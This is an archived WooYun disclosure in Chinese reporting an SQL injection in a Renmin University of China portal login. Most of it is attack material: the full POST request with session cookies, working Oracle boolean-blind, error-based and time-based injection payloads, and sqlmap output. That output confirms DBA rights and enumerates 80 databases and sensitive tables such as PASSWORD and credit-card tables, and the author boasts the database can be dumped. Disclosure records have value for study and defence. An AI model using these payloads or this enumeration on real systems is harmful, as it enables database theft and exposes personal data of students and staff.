乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-07: 细节已通知厂商并且等待厂商处理中 2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开
80个数据库,其中一个340个表,上百万数据,DBA权限,可拖库,然后走小厂商,恩,没错!
中国人民大学统一认证页面
https://cas.ruc.edu.cn/cas/login
登入处存在SQL注入POST请求
POST /account/confirm.do?method=checkfs HTTP/1.1Host: portal.ruc.edu.cnProxy-Connection: keep-aliveContent-Length: 32Accept: */*Origin: http://portal.ruc.edu.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://portal.ruc.edu.cn/account/confirm/reset1.jspAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: neusoftrucportal=5mLFJVlbmZngfJh7TNbZ2yhm2XhstjG4WvywhLgWRT6MjcGyr6s2!608312459; BIGipServerruc_portal=3909593280.42271.0000; JSESSIONID=81FVJVkpTgZL17XvgDhy2c9Dp1hP4Yy5kQHmTJTKFSnQh64xxbWn!-1716597195; BIGipServeraccount=1762109632.2336.0000RA-Ver: 2.7.0RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bccaccount=admin&fs=1&mobile=1111&mail=
证明,80个数据库,其中一个340个表,DBA权限,其他不列了,反正很多
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: account Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: account=admin' AND 2590=2590 AND 'SkMM'='SkMM&fs=1&mobile=1111&mail= Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: account=admin' AND 4993=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(121)||CHR(99)||CHR(113)||(SELECT (CASE WHEN (4993=4993) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(122)||CHR(100)||CHR(113)) AND 'XsTJ'='XsTJ&fs=1&mobile=1111&mail= Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: account=admin' AND 3183=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'oXbv'='oXbv&fs=1&mobile=1111&mail=---web application technology: Servlet 2.5, JSP, JSP 2.1back-end DBMS: Oraclecurrent user is DBA: Trueavailable databases [80]:[*] ADOBE[*] APEX_030200[*] APPQOSSYS[*] BND_HQ[*] BNDTS[*] CMS[*] CTXSYS[*] DBSNMP[*] DCP[*] DCP_APPS[*] DCP_CMS[*] DCP_EDP[*] DCP_EPSA[*] DCP_PORTAL[*] DCP_SNS[*] DW_DEMO[*] E_EVALUATE[*] EDPSIS[*] EDUIDC[*] EPSA[*] EPSA2[*] EXFSYS[*] FLOWS_FILES[*] FRAME[*] ICDC_EDU_REPORT[*] ICDC_ODS[*] ICDC_REPORT[*] ICDC_RUC[*] ICDC_UTIL[*] IDC_I_COMM[*] IDC_MAIL[*] IDC_U2_DQ[*] IDC_U2_GJJL[*] IDC_U2_PUB[*] IDC_U_BKJW[*] IDC_U_COMM[*] IDC_U_CW[*] IDC_U_CW_1[*] IDC_U_CW_2[*] IDC_U_DXP[*] IDC_U_HJ[*] IDC_U_ISS[*] IDC_U_KY[*] IDC_U_KY2[*] IDC_U_OA[*] IDC_U_PUB[*] IDC_U_REPORT[*] IDC_U_RS[*] IDC_U_RYZP[*] IDC_U_SOFT[*] IDC_U_STAT[*] IDC_U_XM[*] IDC_U_XS[*] IDC_U_YJSJW[*] IDC_YJS[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] PERFSTAT[*] PUBINFO[*] RD_GRFW[*] RUC_SWAPPER[*] RUCOA[*] RUCOA_GW[*] SCOTT[*] SIS[*] SSO[*] SSO_USER[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WEBLOGIC[*] WMSYS[*] XDB[*] ZCT_MANAGER[*] ZFT_MANAGERDatabase: IDC_U_PUB[340 tables]+--------------------------------+| A02BK || A03BK || A03BS || A03SS || A03SSCJ || A04BK || A04BS || A04EX || A04SS || A04SSCJ || A05BK || A05BS || A05EX || A05SS || A05SSCJ || AA10 || AAAAA || AD_BUCKET || AD_COUNT || APPOINTMENTACLOWNERTABLE || APPOINTMENTACLTABLE || APPOINTMENTTABLE || ATTACHMENT || BKJW_DM_DSZ || BKJW_DM_JSJY_CLBZ || BKJW_DM_JSJY_HTBZ || BKJW_DM_JSJY_JYLX || BKJW_DM_JWCLBZ || BKJW_DM_PK_JSFPLB || BKJW_DM_PK_JSFPXBBZ || BKJW_DM_PK_PKBZ || BKJW_DM_PK_ZT || BKJW_DM_SXFS || BKJW_DM_WYSLJ_HSJG || BKJW_DM_WYSLJ_JFBZ || BKJW_DM_WYSLJ_KSDJ || BKJW_DM_YDCJZT || BKJW_PK_JSFP_TEMP || BKJW_XK_XHKCHPC || BKJW_XK_XHKCHPC_SFQY || BT_EVENT || BT_EVENT_ACTION || BT_EVENT_TYPE || BUSICATEGORY || CATALOG_ENTITY || CATALOG_PROPERTY_KEY || CATALOG_PROPERTY_VALUE || CHNDD || CHNDDDETAIL || CLU_1JMSSTATE || CLU_1JMSSTORE || CLU_2JMSSTATE || CLU_2JMSSTORE || CMV_NODE || CMV_NODE_ASSIGNED_ROLE || CMV_NODE_VERSION || CMV_NODE_VERSION_PROPERTY || CMV_PROPERTY || CMV_VALUE || CM_NODE || CM_OBJECT_CLASS || CM_PROPERTY || CM_PROPERTY_CHOICE || CM_PROPERTY_DEFINITION || CONTACTACLOWNERTABLE || CONTACTACLTABLE || CONTACTTABLE || CTEST || DATA_SYNC_APPLICATION || DATA_SYNC_ITEM || DATA_SYNC_SCHEMA_URI || DATA_SYNC_VERSION || DICT_DATA_NOT_DISP || DICT_TABLE_INFO || DICT_YESNO || DISCOUNT || DISCOUNT_ASSOCIATION || DISCUSSIONUSERTABLE || DISTCNTTABLE || DISTLISTACLOWNERTABLE || DISTLISTACLTABLE || DISTLISTTABLE || DM_BZKZY || DM_BZRLB || DM_SXLX || DM_ZCLX || DM_ZYX || DRM_SYS_CODEINTEGRATION || DRM_SYS_CONNECTIONPOOL || DRM_SYS_DATASOURCE || DRM_SYS_ENVIRONMENTVARIABLE || DRM_SYS_FIELDCONVERTMAPPING || DRM_SYS_FIELDSASSOCIATION || DRM_SYS_FIELD_SCHEMA_EXTENDS || DRM_SYS_MLTMEANINGFIELDS || DRM_SYS_MLTMEANINGFIELDSDETAIL || DRM_SYS_PUBLICCODEMAINTENANCE || DRM_SYS_TABLECONVERTMAPPING || DRM_SYS_TABLE_SCHEMA_EXTENDS || E$_SER_BKXX || ENTITY || FILE_PENDING || FLYCATEGORY || FLYOBJECT || FLYPARSER || FORUMACLOWNERTABLE || FORUMACLTABLE || FORUMTABLE || FORUM_MESSAGES || GNBG_DM_BGZT || GNBG_DM_JJCD || GNBG_DM_SUBSYSTEM || GNBG_XXXX || GNBG_XXXX_IMPORT || GRADUATETEMP || GROUP_HIERARCHY || GROUP_SECURITY || IDC_SYNC || IDC_U_BSHJBXX || IDC_U_GZZB || IDC_U_JZGJBXX || IDC_U_LSRYJBXX || IDC_U_LXSXX || IDC_U_RS_YXSBZXXX || IDC_U_RS_YXSBZXXX_BAK || IDC_U_RYJBXX || IDC_U_RYJBXX_20080826 || IDC_U_RYJBXX_20080826_1 || IDC_U_RYJBXX_LOG || IDC_U_RYJBXX_TO_XSC || IDC_U_XSJBXX || IDC_U_XSZSXX || IDC_U_XSZSXX_LOG || INFO || INFO_AND_ATTACHMENT || INFO_BOARD || INFO_BOARD_ADMIN || INFO_BOARD_AND_INFO || INFO_BOARD_AND_USER || INFO_BOARD_TYPE || INFO_BROWSE || JBXX || JMSSTATE || JMSSTORE || KY_DM_CDXMXZ || KY_DM_JGLB || KY_DM_PZJG || KY_DM_XKMLKJ || KY_KJXMJBQK || L10N_INTERSECTION || L10N_LOCALE || L10N_RESOURCE || L10N_RESOURCE_TYPE || LS_PERMISSION || LS_RESOURCE || MAIL_ADDRESS || MAIL_BATCH || MAIL_BATCH_ENTRY || MAIL_HEADER || MAIL_MESSAGE || MESSAGEFILETABLE || MESSAGETABLE || ORDER_ADJUSTMENT || ORDER_LINE_ADJUSTMENT || P13N_ANONYMOUS_PROPERTY || P13N_ANONYMOUS_USER || P13N_DELEGATED_HIERARCHY || P13N_ENTITLEMENT_APPLICATION || P13N_ENTITLEMENT_POLICY || P13N_ENTITLEMENT_RESOURCE || P13N_ENTITLEMENT_ROLE || PAR_REPORT || PASSWORD || PBCATCOL || PBCATEDT || PBCATFMT || PBCATTBL || PBCATVLD || PF_BOOK_DEFINITION || PF_BOOK_GROUP || PF_BOOK_INSTANCE || PF_CONSUMER_PORTLETS || PF_CONSUMER_PROPERTIES || PF_CONSUMER_REGISTRY || PF_DESKTOP_DEFINITION || PF_DESKTOP_INSTANCE || PF_LAYOUT_DEFINITION || PF_LOOK_AND_FEEL_DEFINITION || PF_MARKUP_DEFINITION || PF_MENU_DEFINITION || PF_PAGE_DEFINITION || PF_PAGE_INSTANCE || PF_PLACEHOLDER_DEFINITION || PF_PLACEMENT || PF_PORTAL || PF_PORTLET_CATEGORY || PF_PORTLET_CATEGORY_DEFINITION || PF_PORTLET_DEFINITION || PF_PORTLET_INSTANCE || PF_PORTLET_PREFERENCE || PF_PORTLET_PREFERENCE_VALUE || PF_PRODUCER_PROPERTIES || PF_PRODUCER_REGISTRY || PF_PROXY_PORTLET_INSTANCE || PF_SHELL_DEFINITION || PF_THEME_DEFINITION || PLACEHOLDER_PREVIEW || PLAN_TABLE || PLSQL_PROFILER_DATA || PLSQL_PROFILER_RUNS || PLSQL_PROFILER_UNITS || POP3ATTACHMENTS || POP3FOLDERS || POP3MESSAGEHEADERS || POP3MESSAGES || POP3PREFERENCES || POR_1JMSSTATE || POR_1JMSSTORE || POR_2JMSSTATE || POR_2JMSSTORE || PRODUCT_ACHIEVE || PROPERTY_KEY || PROPERTY_VALUE || PUB_BBXX || PUB_DM_RYZTDYB || PUB_SFZHJC || QUERYFIELDS || QUERYFILTER || QUERYOBJECT || QUERYRELATION || ROLEACLS || ROLES || RP_BB || RP_BBMB || RP_BBNR || RP_GSDY || RP_ZB || RP_ZBMB || RS_GWPY_SBJBDM || RS_GWPY_SBLBDM || RS_GWPY_SBLXDM || RS_LSRYSFDM || RYJBXX_TEST || SCENARIO_END_STATE || SEQUENCER || SEQUENCETABLE || SEQUENCETABLE_YEARNUM || SEQUENCE_GENERATOR || SERIALMGT || SER_BKXX || SER_DM_BKXXFLAG || SMART_PERSONNEL || SYS_ASSIGNER_AND_USER || SYS_DEPT || SYS_GROUP || SYS_GROUP_USER || SYS_MODULE || SYS_MODULE_AND_TIME || SYS_MODULE_TIME_LOG || SYS_PERMISSION || SYS_PERMISSION_BAK || SYS_PERMISSION_BAK060630 || SYS_PERM_AND_ORG || SYS_PERM_AND_ROLE || SYS_PERM_AND_ROLE_AND_ORG || SYS_PERM_AND_URL || SYS_PERM_AND_USER || SYS_PERM_DATA_SCOPE || SYS_PERM_LOG || SYS_RESOURCE || SYS_RESOURCE_BAK || SYS_RESOURCE_BAK060630 || SYS_ROLE || SYS_ROLE_DATA || SYS_ROLE_DATA_SCOPE || SYS_ROLE_MODULE || SYS_ROLE_ORG || SYS_ROLE_ORG_USER || SYS_ROLE_USER || SYS_ROLE_USER_BAK061222 || SYS_URL || SYS_USER || SYS_USER_DATA || SYS_USER_DATA_SCOPE || SYS_USER_DEPT || SYS_USER_GROUP || SYS_USER_MODULE || SYS_USER_ROLE || SYS_USER_ROLE_ORG || TASKJOB || TEMPSTUDENT || TEST || TEST_ACCESS || TIANLC_TABLE || TODOACLOWNERTABLE || TODOACLTABLE || TODOTABLE || TOPICFILETABLE || TOPICSUBTABLE || TOPICTABLE || TZFKQK || TZLLQK || UNIQUEIDGENERATOREJBTABLE || USERACLS || USERROLES || USERS || USER_GROUP_CACHE || USER_GROUP_HIERARCHY || USER_PROFILE || USER_SECURITY || USER_SECURITYBAK || USER_SECURITY_TEMP || WEBLOGICJMSSTATE || WEBLOGICJMSSTORE || WEBLOGIC_IS_ALIVE || WLCS_CATEGORY || WLCS_CREDIT_CARD || WLCS_CUSTOMER || WLCS_ORDER || WLCS_ORDER_LINE || WLCS_PRODUCT || WLCS_PRODUCT_CATEGORY || WLCS_PRODUCT_KEYWORD || WLCS_SAVED_ITEM_LIST || WLCS_SECURITY || WLCS_SHIPPING_ADDRESS || WLCS_SHIPPING_METHOD || WLCS_TRANSACTION || WLCS_TRANSACTION_ENTRY || YJS_ZCJF_0507 || YJS_ZCJF_05_07 || ZHANGR || ZHANGRT || ZHAOQUAN || ZH_YJ1 || ZH_YJ4 || ZH_YJ5 || ZH_YJ6 || ZH_YJ7 || ZH_YJ8 |+--------------------------------+Database: IDC_U_PUB+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| IDC_U_RYJBXX_LOG | 268128 || SYS_ROLE_USER | 215255 || SMART_PERSONNEL | 89580 || SYS_ROLE_USER_BAK061222 | 88595 || IDC_U_XSZSXX_LOG | 86414 || IDC_U_RYJBXX_20080826 | 84338 || IDC_U_RYJBXX_20080826_1 | 84338 || SYS_USER | 69390 || ZH_YJ4 | 52187 || ZH_YJ5 | 52187 || ZH_YJ7 | 52142 || ZH_YJ1 | 50313 || USER_SECURITY | 46645 || USER_GROUP_HIERARCHY | 42457 || IDC_U_XSJBXX | 38867 || PUB_SFZHJC | 30268 || ENTITY | 28603 || PF_PLACEMENT | 28002 || PASSWORD | 27830 || USER_SECURITYBAK | 27702 || ZHAOQUAN | 27302 || ZH_YJ6 | 26499 || ZH_YJ8 | 26499 || SYS_PERM_AND_ROLE | 23573 || SYS_PERMISSION | 11341 || TEST_ACCESS | 10551 || PF_PORTLET_INSTANCE | 8615 || GRADUATETEMP | 8034 || PF_BOOK_GROUP | 7534 || PF_DESKTOP_INSTANCE | 6958 || SYS_RESOURCE | 6172 || RP_BBNR | 5931 || POP3MESSAGEHEADERS | 5180 || YJS_ZCJF_0507 | 5152 |...省略+--------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2014-11-12 16:30
暂无